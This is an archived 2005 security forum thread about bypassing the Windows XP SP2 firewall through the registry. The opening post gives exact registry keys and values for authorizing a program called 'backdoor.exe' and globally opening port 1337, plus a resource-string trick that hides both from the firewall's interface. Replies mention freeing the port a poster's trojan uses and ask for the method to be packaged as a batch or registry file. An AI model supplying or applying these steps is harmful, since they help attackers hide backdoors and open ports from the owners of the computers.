Bypassing Windows Firewall

Full Version: Bypassing Windows Firewall

GovernmentSecurity.org > System Security > Networking Security / Firewall / IDS / VPN / Routers

da_cash

Feb 22 2005, 08:35 AM

We can bypass windows firewall using registry.

Just open regedit.exe and go to

CODE

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List

As you can see the sharedaccess service aka windows firewall contains the names of applications allowed for outbound connections.

Tto give access to the desired application we need to add similiar key:

CODE

C:\\WINDOWS\\system32\\backdoor.exe"="C:\\WINDOWS\\system32\\backdoor.exe:*:Enabled

But then out "backdoor" will be listed in Firewall GUI allowed applications.

Anyway we may hide it by making this

CODE

C:\\WINDOWS\\system32\\backdoor.exe"="C:\\WINDOWS\\system32\\backdoor.exe:*:Enabled:@xpsp2res.dll,-22019"

We can also open globally any port we want

CODE

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List

by adding similiar value inside this registry key

CODE

"1337:TCP"="1337:TCP:*:Enabled:Name"

Where "Name" is the name we want to be showed in the GUI

To hide port from listing in the GUI mode we may make something like that

CODE

1337:TCP:*:Enabled:@xpsp2res.dll,-22003

an then the port will be hidden from listing (XP SP2)..

It works on XP SP2 i didn't tested it on any other os.

This method is used by some malware /spyware manufacturers and together with rootkit it may be reallly dangerous.

Jumpi

Feb 22 2005, 11:48 AM

i use to free the port my trojan uses. it works with a single commandline, i'm gonna lok for it when i'm at home again.

a reverse-connection was never stopped by the sp2-firewall, this seems to be the best method at the moment cause you don't see anything strange in the firewallsettings

o0oKARo0o

Feb 23 2005, 12:28 PM

It does work, excellent tip

knull

Feb 23 2005, 01:56 PM

good, good, good...

BN says:
This was the 3rd useless post in 21 posts. Disabled account 28 days. Any other takers?

o0oKARo0o

Feb 23 2005, 02:11 PM

Actually it works but it still in the list but under remote assistance, any ideas ?
And using a rootkit, aftewards, the connection isn´t allowed by firewall anymore dut to the inexistence of the program...

ninar12

Feb 23 2005, 05:28 PM

one question why dont u use "netsh"

netsh firewall ...

much confortable

but i dont know if its a native commant under nt
xp im sure it works

Lie8

Feb 27 2005, 10:11 AM

very very good tut .... thnx

BN says:
This person had 3 useless posts out of 10. Another 28-day winner!

dw-chow

Jun 4 2005, 06:32 AM

nice, but one question still remains... is it possible to get through it by remote means?

bah

Jun 6 2005, 10:22 PM

Actually I have another question I checked on win3k for the reg keys
and couldnt find any even though windows firewall was up and applications
had been added to exempt list from the gui, so were are the win3k
reg keys and does the :@xpsp2res.dll,-22003 work under w3k ?

AdmiralB

Jun 26 2005, 01:49 AM

maybe some1 can compile into a nice bat file

smith_john

Jun 26 2005, 08:27 AM

nice topic

From Packet: Sounds like a thx post to me! Warning points added. And from a chronic thanks poster so muchos suspend too.

Jackson

Jun 27 2005, 09:12 AM

Hello Really idea!! However, somebody can pack in regfile then one only must explain! And how is that with other Firewalls this functions there just??

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.